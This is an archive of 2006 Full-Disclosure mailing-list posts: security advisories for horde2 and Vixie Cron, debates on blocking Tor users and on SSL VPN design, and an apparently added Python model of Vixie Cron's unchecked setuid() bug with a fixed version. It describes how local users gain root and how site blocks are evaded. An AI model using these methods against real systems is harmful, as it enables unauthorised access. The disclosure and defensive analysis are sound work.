Lcw5xF61r5jIqq5+Z3ZeEII=
=kPBV
-END PGP SIGNATURE-



Re: Antw: [Full-disclosure] [SECURITY] [DSA 1034-1] New horde2 packages fix several vulnerabilities

2006-06-09 Thread Cardoso

Yes, he did. Happens all the time, there's no such thing as a "list of
seasoned professionals, that know better and don't act like newbies". 

I wonder how much of a daily mail traffic is made of autoresponders and
whitelist-challenge messages. 




On Fri, 09 Jun 2006 13:37:18 -0400
neil davis <[EMAIL PROTECTED]> wrote:

nd> No he didn't. Someone please tell me he didn't... I guess we'll be
nd> seeing Rocco's out of office message for a while...
nd> 
nd> On Fri, 2006-04-14 at 16:46 +0200, Rocco Maiullari wrote:
nd> > Good day!
nd> > 
nd> > Unfortunately I cannot answer your e-mail immediately, as I am out of
nd> > the office up to and including 21.04.2006.
nd> > In urgent cases please contact my colleague 
nd> > 
nd> > Timo Dahlhoff
nd> > Tel. : 02506 / 922 - 5266 
nd> > e-mail : [EMAIL PROTECTED] 
nd> > 
nd> > 
nd> > Rocco Maiullari
nd> > Webmaster
nd> > 
nd> > The Phone House Telecom GmbH
nd> > Münsterstr. 109
nd> > 48155 Münster
nd> > 
nd> > Phone: +49 (0) 2506 - 922 5256
nd> > Fax: +49 (0) 2506 - 922 1292 
nd> > E-Mail: [EMAIL PROTECTED]
nd> > http://www.phonehouse.de
nd> > 
nd> > Lower your phone bill - with TalkTalk, our new landline offer!
nd> > More info at: www.talktalk.de 
nd> > 
nd> > >>> full-disclosure 04/14/06 16:42 >>>
nd> > 
nd> > -BEGIN PGP SIGNED MESSAGE-
nd> > Hash: SHA1
nd> > 
nd> > - 
--
nd> > Debian Security Advisory DSA 1034-1[EMAIL PROTECTED]
nd> > http://www.debian.org/security/ Moritz Muehlenhoff
nd> > April 14th, 2006http://www.debian.org/security/faq
nd> > - 
--
nd> > 
nd> > Package: horde2
nd> > Vulnerability  : several
nd> > Problem-Type   : remote
nd> > Debian-specific: no
nd> > CVE ID : CVE-2006-1260 CVE-2006-1491
nd> > 
nd> > Several remote vulnerabilities have been discovered in the Horde web
nd> > application framework, which may lead to the execution of arbitrary 
nd> > web script code. The Common Vulnerabilities and Exposures project
nd> > identifies the following problems:
nd> > 
nd> > CVE-2006-1260
nd> > 
nd> > Null characters in the URL parameter bypass a sanity check, which
nd> > allowed remote attackers to read arbitrary files, which allowed
nd> > information disclosure.
nd> > 
nd> > CVE-2006-1491
nd> > 
nd> > User input in the help viewer was passed unsanitised to the eval()
nd> > function, which allowed injection of arbitrary web code.
nd> > 
nd> > 
nd> > The old stable distribution (woody) doesn't contain horde2 packages.
nd> > 
nd> > For the stable distribution (sarge) these problems have been fixed in
nd> > version 2.2.8-1sarge2.
nd> > 
nd> > The unstable distribution (sid) does no longer contain horde2 packages.
nd> > 
nd> > We recommend that you upgrade your horde2 package.
nd> > 
nd> > 
nd> > Upgrade Instructions
nd> > - 
nd> > 
nd> > wget url
nd> > will fetch the file for you
nd> > dpkg -i file.deb
nd> > will install the referenced file.
nd> > 
nd> > If you are using the apt-get package manager, use the line for
nd> > sources.list as given below:
nd> > 
nd> > apt-get update
nd> > will update the internal database
nd> > apt-get upgrade
nd> > will install corrected packages
nd> > 
nd> > You may use an automated update by adding the resources from the
nd> > footer to the proper configuration.
nd> > 
nd> > 
nd> > Debian GNU/Linux 3.1 alias sarge
nd> > - 
nd> > 
nd> >   Source archives:
nd> > 
nd> > 
http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.dsc
nd> >   Size/MD5 checksum:  575 acf3f1924f04e2faddfd06ba9b01820e
nd> > 
http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.diff.gz
nd> >   Size/MD5 checksum:39504 fb338c016b70e69fa4b867fa116b86dc
nd> > 
http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8.orig.tar.gz
nd> >   Size/MD5 checksum:   683005 89961af4e4488a908147d7b3a0dc3b44
nd> > 
nd> >   Architecture independent components:
nd> > 
nd> > 
http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2_all.deb
nd> >   Size/MD5 checksum:   721398 35fa1bf8bf8b4f2be1076501b984367a
nd> > 
nd> > 
nd> >   These files will probably be moved into the stable distribution on
nd> >   its next update.
nd> > 
nd> > - 
-
nd> > For apt-get: deb http://security.debian.org/ stable/updates main
nd> > For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
nd> > Mailing list: debian-security-announce@lists.debian.org
nd> > Package info: `apt-cache show ' and http://packages.debian.org/
nd> > -BEGIN PGP SIGNATURE-
nd> > Version: GnuPG v1.4.3 (GNU/Linux)
nd> > 
nd> > iD8DBQFEP7SJX

Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.

2006-06-09 Thread Mike Owen

On 6/9/06, Cardoso <[EMAIL PROTECTED]> wrote:


Most websites rely on cookies, sessions and javascript. If a user can't
live with that, I'm very sorry but there's nothing I can do.



Actually, no, most websites don't. I use a deny by default cookie
policy, and NoScript, and nearly every single website I visit works. I
need to enable session cookies when I'm buying something online, but
it is rare that I ever need to enable JavaScript for a site.


Same about corporate networks where people way high on the food chain
demand full access, no firewall control or even transparent filtering.



If you have that kind of problem where you work, you need to work on
more education and security awareness. Where I am, we force all
outbound traffic through a proxy, and everyone including the oh so
precious C level goes through it.

Mike



Re: Antw: [Full-disclosure] [SECURITY] [DSA 1034-1] New horde2 packages fix several vulnerabilities

2006-06-09 Thread neil davis
No he didn't. Someone please tell me he didn't... I guess we'll be
seeing Rocco's out of office message for a while...

On Fri, 2006-04-14 at 16:46 +0200, Rocco Maiullari wrote:
> Good day!
> 
> Unfortunately I cannot answer your e-mail immediately, as I am out of
> the office up to and including 21.04.2006.
> In urgent cases please contact my colleague 
> 
> Timo Dahlhoff
> Tel. : 02506 / 922 - 5266 
> e-mail : [EMAIL PROTECTED] 
> 
> 
> Rocco Maiullari
> Webmaster
> 
> The Phone House Telecom GmbH
> Münsterstr. 109
> 48155 Münster
> 
> Phone: +49 (0) 2506 - 922 5256
> Fax: +49 (0) 2506 - 922 1292 
> E-Mail: [EMAIL PROTECTED]
> http://www.phonehouse.de
> 
> Lower your phone bill - with TalkTalk, our new landline offer!
> More info at: www.talktalk.de 
> 
> >>> full-disclosure 04/14/06 16:42 >>>
> 
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> - --
> Debian Security Advisory DSA 1034-1[EMAIL PROTECTED]
> http://www.debian.org/security/ Moritz Muehlenhoff
> April 14th, 2006http://www.debian.org/security/faq
> - --
> 
> Package: horde2
> Vulnerability  : several
> Problem-Type   : remote
> Debian-specific: no
> CVE ID : CVE-2006-1260 CVE-2006-1491
> 
> Several remote vulnerabilities have been discovered in the Horde web
> application framework, which may lead to the execution of arbitrary 
> web script code. The Common Vulnerabilities and Exposures project
> identifies the following problems:
> 
> CVE-2006-1260
> 
> Null characters in the URL parameter bypass a sanity check, which
> allowed remote attackers to read arbitrary files, which allowed
> information disclosure.
> 
> CVE-2006-1491
> 
> User input in the help viewer was passed unsanitised to the eval()
> function, which allowed injection of arbitrary web code.
> 
> 
> The old stable distribution (woody) doesn't contain horde2 packages.
> 
> For the stable distribution (sarge) these problems have been fixed in
> version 2.2.8-1sarge2.
> 
> The unstable distribution (sid) does no longer contain horde2 packages.
> 
> We recommend that you upgrade your horde2 package.
> 
> 
> Upgrade Instructions
> - 
> 
> wget url
> will fetch the file for you
> dpkg -i file.deb
> will install the referenced file.
> 
> If you are using the apt-get package manager, use the line for
> sources.list as given below:
> 
> apt-get update
> will update the internal database
> apt-get upgrade
> will install corrected packages
> 
> You may use an automated update by adding the resources from the
> footer to the proper configuration.
> 
> 
> Debian GNU/Linux 3.1 alias sarge
> - 
> 
>   Source archives:
> 
> 
> http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.dsc
>   Size/MD5 checksum:  575 acf3f1924f04e2faddfd06ba9b01820e
> 
> http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.diff.gz
>   Size/MD5 checksum:39504 fb338c016b70e69fa4b867fa116b86dc
> 
> http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8.orig.tar.gz
>   Size/MD5 checksum:   683005 89961af4e4488a908147d7b3a0dc3b44
> 
>   Architecture independent components:
> 
> 
> http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2_all.deb
>   Size/MD5 checksum:   721398 35fa1bf8bf8b4f2be1076501b984367a
> 
> 
>   These files will probably be moved into the stable distribution on
>   its next update.
> 
> - 
> -
> For apt-get: deb http://security.debian.org/ stable/updates main
> For dpkg-ftp: ftp://security.debian.org/debian-security 
> dists/stable/updates/main
> Mailing list: debian-security-announce@lists.debian.org
> Package info: `apt-cache show ' and http://packages.debian.org/
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.3 (GNU/Linux)
> 
> iD8DBQFEP7SJXm3vHE4uyloRAsVVAJ4n9UoO57tJYCw1JePujnjy90XFvACg3DLn
> nrfwvObZjSThW+pXcD8NI38=
> =BIdm
> -END PGP SIGNATURE-
> 



Re: [Full-disclosure] blue security folds

2006-06-09 Thread neil davis

> While I agree (mostly), getting the ISPs to do what you suggest will 
> never happen.  If I, Joe Clueless User, have a bot running on my PC 
> spamming half the world, and my ISP notices this and shuts me off, what 
> will I do?  
Most people would call the ISP tech support and say "my web doesn't work
any more". At that point they could be informed that they are part of a
botnet and need to reinstall their OS, your personal information is
possibly compromised, call us when you are done and we'll switch you
back on. 

I used to co-locate a server in an ISP and it got pwned. The ISP shut my
port off. I called, and he told me what was going on, I came down,
swapped out the box with a properly secured one (I was inexperienced at
the time), and was back up in no time.

> Assuming I'm like the majority of users and either a) don't know, or 
You'd know when your port got shut down and called tech support because
they'd tell you.

> b) don't care what they're talking about, 
You'd care if they cut you off.

>  I'll cancel my account and switch to another ISP (that won't shut me off).  
If ISPs all did the right thing, you'd get cut off again and again and
maybe eventually follow their advice or go without internet until you
did.

>  To do what 
> you suggest would be for the greater good of the whole "Internet 
> community", but would negatively affect $ISP's bottom line.  
Excess bandwidth usage doesn't? How about all the time spent tracking
down complaints and begging to have your ISP pulled out of blacklists
because your users' computers are spamming people?

This line of reasoning doesn't work for me. It doesn't work for the
internet either, as we can all see. ISPs need to start turning ports
off for people that are part of botnets. If it kept happening to them,
they'd wise up and stop running every attachment they received.

-Neil



Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.

2006-06-09 Thread Cardoso

Most websites rely on cookies, sessions and javascript. If a user can't
live with that, I'm very sorry but there's nothing I can do. 

Same about corporate networks where people way high on the food chain
demand full access, no firewall control or even transparent filtering. 

On Fri, 9 Jun 2006 13:56:32 -0300
Rodrigo Barbosa <[EMAIL PROTECTED]> wrote:

RB> -BEGIN PGP SIGNED MESSAGE-
RB> Hash: SHA1
RB> 
RB> On Fri, Jun 09, 2006 at 12:33:39PM -0400, Michael Holstein wrote:
RB> > >Your interpretation of the Internet is a bit distorted.
RB> > 
RB> > We're not talking about authenticated websites here (perhaps I should 
RB> > have made that more clear), nor are we talking about using TOR, etc. for 
RB> > malicious purposes.
RB> > 
RB> > For the purpose of this (largely theoretical) argument, I meant 
RB> > "publicly accessible, non-authenticated websites".
RB> 
RB> Just because a park is a public place doesn't give me the right
RB> to, let's say, drive a car over the grass.
RB> 
RB> Even in public places there are rules that should be followed.
RB> 
RB> - -- 
RB> Rodrigo Barbosa
RB> "Quid quid Latine dictum sit, altum viditur"
RB> "Be excellent to each other ..." - Bill & Ted (Wyld Stallyns)
RB> 
RB> -BEGIN PGP SIGNATURE-
RB> Version: GnuPG v1.4.1 (GNU/Linux)
RB> 
RB> iD8DBQFEiafypdyWzQ5b5ckRAvOQAKCed74EcYcxkphgBWt0yrCtlpe2/wCgvFG3
RB> qg91GcAr7Twpg6hcxJiVQzY=
RB> =G/OL
RB> -END PGP SIGNATURE-
RB> 
RB> 

Allgemeinen Anschulterlaubnis
Cardoso <[EMAIL PROTECTED]> - SkypeIn: (11) 3711-2466 / (41) 3941-5299
digital life: http://www.contraditorium.com personal site and blog: 
http://www.carloscardoso.com



Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.

2006-06-09 Thread Rodrigo Barbosa
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Fri, Jun 09, 2006 at 12:33:39PM -0400, Michael Holstein wrote:
> >Your interpretation of the Internet is a bit distorted.
> 
> We're not talking about authenticated websites here (perhaps I should 
> have made that more clear), nor are we talking about using TOR, etc. for 
> malicious purposes.
> 
> For the purpose of this (largely theoretical) argument, I meant 
> "publicly accessible, non-authenticated websites".

Just because a park is a public place doesn't give me the right
to, let's say, drive a car over the grass.

Even in public places there are rules that should be followed.

- -- 
Rodrigo Barbosa
"Quid quid Latine dictum sit, altum viditur"
"Be excellent to each other ..." - Bill & Ted (Wyld Stallyns)

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFEiafypdyWzQ5b5ckRAvOQAKCed74EcYcxkphgBWt0yrCtlpe2/wCgvFG3
qg91GcAr7Twpg6hcxJiVQzY=
=G/OL
-END PGP SIGNATURE-



Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.

2006-06-09 Thread Micheal Espinola Jr

Understood.  :-)

On 6/9/06, Michael Holstein <[EMAIL PROTECTED]> wrote:

> Your interpretation of the Internet is a bit distorted.

We're not talking about authenticated websites here (perhaps I should
have made that more clear), nor are we talking about using TOR, etc. for
malicious purposes.

For the purpose of this (largely theoretical) argument, I meant
"publicly accessible, non-authenticated websites".




--
ME2



Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.

2006-06-09 Thread Michael Holstein

Your interpretation of the Internet is a bit distorted.


We're not talking about authenticated websites here (perhaps I should 
have made that more clear), nor are we talking about using TOR, etc. for 
malicious purposes.


For the purpose of this (largely theoretical) argument, I meant 
"publicly accessible, non-authenticated websites".


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.

2006-06-09 Thread Micheal Espinola Jr

Your interpretation of the Internet is a bit distorted.

On 6/9/06, Michael Holstein <[EMAIL PROTECTED]> wrote:


If you want to make your website private, don't put it on the Internet.



--
ME2



Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.

2006-06-09 Thread Michael Holstein

But remember your rights stop when the rights of others start. So,
if a given admin wants people who use Tor to be blocked from his
particular site, it is his right. I might not agree with it, but
I'll defend his right to do so. After all, it is his site. If he
was to do that (and makes a clear statement that he is doing so),
he will be losing users perhaps, but it is his call.


As long as I'm not breaking into anything, there's nothing wrong/illegal 
with using anonymity tools to access a public website. If you put 
something on the public internet for all to see, you can't complain 
about people trying to avoid your attempts to surveil them.



What rights do you have over other people's networks and sites ?
What rights do you have to circumvent the decisions they made ?
If you don't like the way they are doing things, go somewhere
else. No one is forcing you to stop using Tor or being anonymous.


Public Internet is just that .. Public. If I can't access said site 
with method #1, I can use method #2. If site says "you're using TOR, go 
away", I can use $random_proxy in $random_country and accomplish the 
same thing.


If you want to make your website private, don't put it on the Internet.

/mike.



Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.

2006-06-09 Thread Rodrigo Barbosa
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Fri, Jun 09, 2006 at 11:47:59AM -0400, Michael Holstein wrote:
> >again, redirecting a tor user to a 403 requires you to sit and think up of
> >a workaround. perhaps you aren't able to come up with one or you don't
> >want to take the time/effort. this means i've effectively deterred you from
> >using tor to get to the website. now if you care about the website more
> >than your privacy, you'd not use tor. if you cared about privacy more,
> >you'd not visit the site. you've been deterred from visiting the site
> >anonymously. which means it worked. how many people will spend more
> >time in order to visit the site?
> 
> As an avid supporter of TOR (and previous operator of a multi-megabit 
> exit node), I do this all the time.
> 
> I'm going to be anonymous dammit, and I don't care what the other side 
> thinks. The harder you try to keep us out, the harder we work to get 
> around it. This is a technical battle you'll never win, because there 
> are more idealists that believe in privacy than there are un-clued 
> admins (and LEO) that think otherwise.

I'm sorry Michael, but you are a fanatic, in the worst possible
meaning of the word.

I too am a defender of privacy. I use lots of privacy plugins on
my browser, encrypt e-mails with GPG, and sometimes even use Tor
when going to some sites from companies with questionable reputation.
I too would fight like mad if the government (any) decided to ban Tor
or any other privacy tool. There is nothing wrong with that.

But remember your rights stop when the rights of others start. So,
if a given admin wants people who use Tor to be blocked from his
particular site, it is his right. I might not agree with it, but
I'll defend his right to do so. After all, it is his site. If he
was to do that (and makes a clear statement that he is doing so),
he will be losing users perhaps, but it is his call.

What rights do you have over other people's networks and sites ?
What rights do you have to circumvent the decisions they made ?
If you don't like the way they are doing things, go somewhere
else. No one is forcing you to stop using Tor or being anonymous.

- -- 
Rodrigo Barbosa
"Quid quid Latine dictum sit, altum viditur"
"Be excellent to each other ..." - Bill & Ted (Wyld Stallyns)

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFEiZtIpdyWzQ5b5ckRAv43AJ9PSILwd+9pXb5U7I3AGfhDcewh0QCgnnFl
xUgTA2JbBgcdMd/AW2/EY34=
=2RVR
-END PGP SIGNATURE-



Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.

2006-06-09 Thread Michael Holstein

again, redirecting a tor user to a 403 requires you to sit and think up of
a workaround. perhaps you aren't able to come up with one or you don't
want to take the time/effort. this means i've effectively deterred you from
using tor to get to the website. now if you care about the website more
than your privacy, you'd not use tor. if you cared about privacy more,
you'd not visit the site. you've been deterred from visiting the site
anonymously. which means it worked. how many people will spend more
time in order to visit the site?


As an avid supporter of TOR (and previous operator of a multi-megabit 
exit node), I do this all the time.


I'm going to be anonymous dammit, and I don't care what the other side 
thinks. The harder you try to keep us out, the harder we work to get 
around it. This is a technical battle you'll never win, because there 
are more idealists that believe in privacy than there are un-clued 
admins (and LEO) that think otherwise.


/mike.



Re: [Full-disclosure] SSL VPNs and security

2006-06-09 Thread Michael Holstein

> SSL certificates are free.  You just have to have enough knowledge to
> distribute your own CA certificate.  For a VPN appliance, this should
> not be a problem at all, since only your trusted users should be
> accessing it. Even if you aren't competent enough to figure out how to
> distribute your own CA certificate, I believe there are such things as
> wildcard certificates.


Great .. setup a SSL vpn, then tell your users it's okay to click "yes" 
on the "untrusted certificate" popup.


Sure, it's trivial to create self-signed certs (or run a CA), but 
distributing your cert (or the CA cert) to all but a handful of clients 
is a logistical nightmare.


If you're going to be installing stuff, might as well make that a 
IKE/IPSEC client and do it the right way to begin with.


/mike.



[Full-disclosure] [ GLSA 200606-07 ] Vixie Cron: Privilege Escalation

2006-06-09 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200606-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Vixie Cron: Privilege Escalation
      Date: June 09, 2006
      Bugs: #134194
        ID: 200606-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Vixie Cron allows local users to execute programs as root.

Background
==========

Vixie Cron is a command scheduler with extended syntax over cron.

Affected packages
=================

    -------------------------------------------------------------------
     Package                 /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  sys-process/vixie-cron      < 4.1-r9                    >= 4.1-r9

Description
===========

Roman Veretelnikov discovered that Vixie Cron does not check whether the
setuid() call in do_command.c succeeded. When that call fails because the
target user has exceeded assigned resource limits, the scheduled command
is run without privileges having been dropped.

Impact
======

Local users can execute code with root privileges by deliberately
exceeding their assigned resource limits and then starting a command
through Vixie Cron. This requires resource limits to be in place on the
machine.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Vixie Cron users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=sys-process/vixie-cron-4.1-r9"

References
==========

  [ 1 ] CVE-2006-2607
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2607

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200606-07.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



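The unchecked setuid() pattern the advisory describes, as an added Python model that is not Vixie Cron's code: FakeProcess is a constructed stand-in for the kernel's view of the cron child, so the failure can be reproduced without root, and which resource limit is exhausted is the model's assumption (it uses the target user's process count, the RLIMIT_NPROC case in which setuid(2) fails with EAGAIN).

```python
import errno
import os
from dataclasses import dataclass
from typing import Callable


@dataclass
class FakeProcess:
    """Constructed stand-in for the kernel's view of the cron child.

    The modelled limit is the target user's process count; the advisory only
    says 'resource limits', so the choice of limit is an assumption here."""
    euid: int = 0                 # cron's child starts out as root
    target_nproc: int = 0         # processes the target user already owns
    target_nproc_limit: int = 10  # that user's RLIMIT_NPROC

    def setuid(self, uid: int) -> None:
        # setuid(2) refuses the switch with EAGAIN when the target uid is
        # already at its process limit; the effective uid then stays root.
        if self.target_nproc >= self.target_nproc_limit:
            raise OSError(errno.EAGAIN, os.strerror(errno.EAGAIN))
        self.euid = uid

    def geteuid(self) -> int:
        return self.euid


def run_job_unchecked(proc: FakeProcess, uid: int,
                      job: Callable[[int], int]) -> int:
    """The defective pattern: a setuid() failure is swallowed and the job
    still runs with whatever identity the process happens to have."""
    try:
        proc.setuid(uid)
    except OSError:
        pass                      # the bug: nobody looks at the failure
    return job(proc.geteuid())


def run_job_checked(proc: FakeProcess, uid: int,
                    job: Callable[[int], int]) -> int:
    """Fixed pattern: abort unless the switch succeeded and the effective
    uid verifiably is the target user."""
    try:
        proc.setuid(uid)
    except OSError as exc:
        raise PermissionError(
            f"setuid({uid}) failed ({exc.strerror}); job not run") from exc
    if proc.geteuid() != uid:
        raise PermissionError("effective uid did not change; job not run")
    return job(proc.geteuid())


def job_identity(runner, proc: FakeProcess, uid: int):
    """Return the euid the job saw, or None if the runner refused to run it."""
    try:
        return runner(proc, uid, lambda euid: euid)
    except PermissionError:
        return None


def drop_privileges(uid: int, gid: int) -> None:
    """Real-process version for a daemon: groups first, then gid, then uid,
    every step checked, and a final probe that root cannot be regained."""
    os.setgroups([])
    os.setgid(gid)
    os.setuid(uid)
    if os.getuid() != uid or os.geteuid() != uid or os.getgid() != gid:
        raise PermissionError("privilege drop incomplete")
    try:
        os.setuid(0)
    except OSError:
        return                    # expected: the drop is not reversible
    raise PermissionError("privilege drop reversible")


if __name__ == "__main__":
    saturated = FakeProcess(euid=0, target_nproc=10, target_nproc_limit=10)
    print("unchecked, limit hit:", job_identity(run_job_unchecked, saturated, 1000))
    saturated = FakeProcess(euid=0, target_nproc=10, target_nproc_limit=10)
    print("checked, limit hit:  ", job_identity(run_job_checked, saturated, 1000))
```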
Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.

2006-06-09 Thread John Sprocket
responses inline

On 6/8/06, Eliah Kagan <[EMAIL PROTECTED]> wrote:
> On 6/8/06, John Sprocket wrote:
> > but like all tools it's a double-edged sword and is easy to abuse.
> > saying "do not bother. you're fighting against privacy, find a better
> > way" is not solving the problem but obviously avoiding it in the
> > first place. again the original problem is of identifying a tor user.
> > a user choosing to use a known community supported utility
> > to keep their anonymity (or invalidates their ip). it was stated
> > that you could lex the cached-directory for a blacklist of ips.
>
> The problem, in the first place, is that people are hacking the
> websites of others. Saying, "let's block tor so that it will be
> slightly harder for some hackers to be quite so anonymous while
> eroding the privacy of thousands of legitimate users" is called
> **avoiding the problem**. When you do that instead of securing your
> servers, you're going to get hacked.

you're suggesting there's something wrong with securing your servers,
AND categorizing tor users? would doing both not be considered the same
thing? if you have no choice but to use closed-source or vuln-ridden
software there is nothing you can do besides not use it. if you have a
client that requires some proprietary software then that satisfies the
"no choice". you can also restrict what a user can do to the machine,
but if the functionality of the application requires certain privileges
and an attacker earns those privileges. then they have the potential to
act in the context of the application.

let's say we're referring to a web application because that's what tor
is commonly associated with. a vuln is discovered where you can insert a
record of your choice, then said attacker has the ability to modify flow
of the application. remember, you don't control the application, and the
application has a requirement of certain resources. how would you secure
it from being modified by itself? even if it's only just messing with
records that belong to it? take note that this is without having access
to the code itself. offtopic, but it's a scenario where you can't quite
secure the application from itself.

so what is wrong with directing tor users? i prevent you from using
a tool to keep your privacy when there's no reason you need to be
visiting the host anonymously in the first place?
i'm suggesting that an anonymous user in my scenario would be considered
an illegitimate user. no reason a user should require their privacy to
use a service that i provide.

> > so redirecting them to a page saying that says "anonymous users
> > not allowed" or denying a user from running ssh over tor makes
> > sense to me because it's my equipment after all, and i'd want to know
> > who's using tor and who isn't.
>
> You could require that I give you my social security number and run a
> credit check on me to view your site, too. You could give me a page
> saying that I was not allowed to access the site if I didn't agree to
> that. But that is very far from saying that it would make sense for
> you to do so. It wouldn't. It is legal for you to act destructively to
> people at large wishing their privacy to be respected, and to your own
> users specifically, but that doesn't mean that it is rational or
> morally right for you to do so.

again, redirecting a tor user to a 403 requires you to sit and think up
of a workaround. perhaps you aren't able to come up with one or you
don't want to take the time/effort. this means i've effectively deterred
you from using tor to get to the website. now if you care about the
website more than your privacy, you'd not use tor. if you cared about
privacy more, you'd not visit the site. you've been deterred from
visiting the site anonymously. which means it worked. how many people
will spend more time in order to visit the site?

> > suggesting that an admin shouldn't bother, hackers will work
> > around it is retarded. of course they'll work around it, but
> > essentially you're raising the bar so someone will have to make
> > more effort. you can't really secure everything against everybody
> > (and still keep your usability. the teeter-totter of security), but
> > you can make it enough of a pain in the ass to deter them from
> > messing with it.
>
> And that is why only leet hackers are able to download movies and
> music on the Internet. Because thousands of technical professionals
> have joined forces to raise the bar and ensure that only people who
> really know what they're doing can do that, and how could thousands of
> technical professionals fail to succeed against millions of noobs?
> Right...
>
> If what you are saying were really true, that would only add to my
> argument about how you're handicapping legitimate users while doing
> nothing against hackers.

my statement is to consider a tor user illegitimate. again, no reason
someone should really need to keep their anonymity when visiting a
site that i host. someone with access to a proxy or a botnet of spybots
will then have the ability to visit their website and keep their
"privacy". but most who don't will just use tor.
how man

Re: [Full-disclosure] SSL VPNs and security

2006-06-09 Thread Tim
> >Set up a wildcard record, *.webvpn.example.org, pointing to the device.
> >The device then maps all internal domain names or IP addresses to a
> >unique hostname, such as:  internalhost.webvpn.example.org, or
> >192-168-0-1.webvpn.example.org, etc.
> 
> This has the side effect of making procurement of the SSL certificates 
> *very* expensive.

SSL certificates are free.  You just have to have enough knowledge to
distribute your own CA certificate.  For a VPN appliance, this should
not be a problem at all, since only your trusted users should be
accessing it. Even if you aren't competent enough to figure out how to
distribute your own CA certificate, I believe there are such things as
wildcard certificates.

tim



Re: [Full-disclosure] SSL VPNs and security

2006-06-09 Thread Tim
> That depends on whether the solution tries to solve single-sign-on
> problems as well.  If the vendor is trying to handle SSO in such an
> environment, then they are probably using domain cookies.  The
> problems are exactly the same as the ones Michal listed, plus some
> additional ones specific to domain cookies.

Right, that does make it difficult.  There are probably workarounds, but
they may be browser-specific.  Wildcard cookies, cookies set to other
origins, or somehow setting document.domain back to the base domain
after the initial page load might help, but some would probably present
the same problem.

The web was never designed for complex application development.  At
least, web standards aren't.  Use a real VPN. 

cheers,
tim



Re: [Full-disclosure] SSL VPNs and security

2006-06-09 Thread Michael Holstein

> Set up a wildcard record, *.webvpn.example.org, pointing to the device.
> The device then maps all internal domain names or IP addresses to a
> unique hostname, such as:  internalhost.webvpn.example.org, or
> 192-168-0-1.webvpn.example.org, etc.


This has the side effect of making procurement of the SSL certificates 
*very* expensive.


/mike.



[Full-disclosure] Re: SSL VPNs and security

2006-06-09 Thread Amit Klein (AKsecurity)
On 8 Jun 2006 at 22:48, Michal Zalewski wrote:

> "Web VPN" or "SSL VPN" is a term used to denote methods for accessing
> company's internal applications with a bare WWW browser, with the use of
> browser-based SSO authentication and SSL tunneling. As opposed to IPSec,
> no additional software or configuration is required, and hence, corporate
> users can use pretty much any computer they can put their hands on.


> 
>   - Application cookies set by other applications. If passed to the
> browser (as some SSL VPNs do), these cookies are separated by the use
> of "path" parameter alone, which does not necessarily establish a
> browser security domain boundary. This is equivalent to the attacker
> obtaining user credentials to these applications.
> 

Yes, the path field (in Set-Cookie) doesn't buy you much, see a detailed 
discussion in 
"Path Insecurity":
http://www.webappsec.org/lists/websecurity/archive/2006-03/msg0.html

-Amit



Re: [Full-disclosure] SSL VPNs and security

2006-06-09 Thread Brian Eaton

On 6/9/06, Tim <[EMAIL PROTECTED]> wrote:

> Set up a wildcard record, *.webvpn.example.org, pointing to the device.
> The device then maps all internal domain names or IP addresses to a
> unique hostname, such as:  internalhost.webvpn.example.org, or
> 192-168-0-1.webvpn.example.org, etc.
>
> Wouldn't this properly segment different internal sites, such that an
> XSS in one wouldn't impact the other?  If so, pay attention all SSL VPN
> vendors: it is your free idea for the week.


That depends on whether the solution tries to solve single-sign-on
problems as well.  If the vendor is trying to handle SSO in such an
environment, then they are probably using domain cookies.  The
problems are exactly the same as the ones Michal listed, plus some
additional ones specific to domain cookies.

- Brian



Re: [Full-disclosure] SSL VPNs and security

2006-06-09 Thread Tim
Hello MZ,

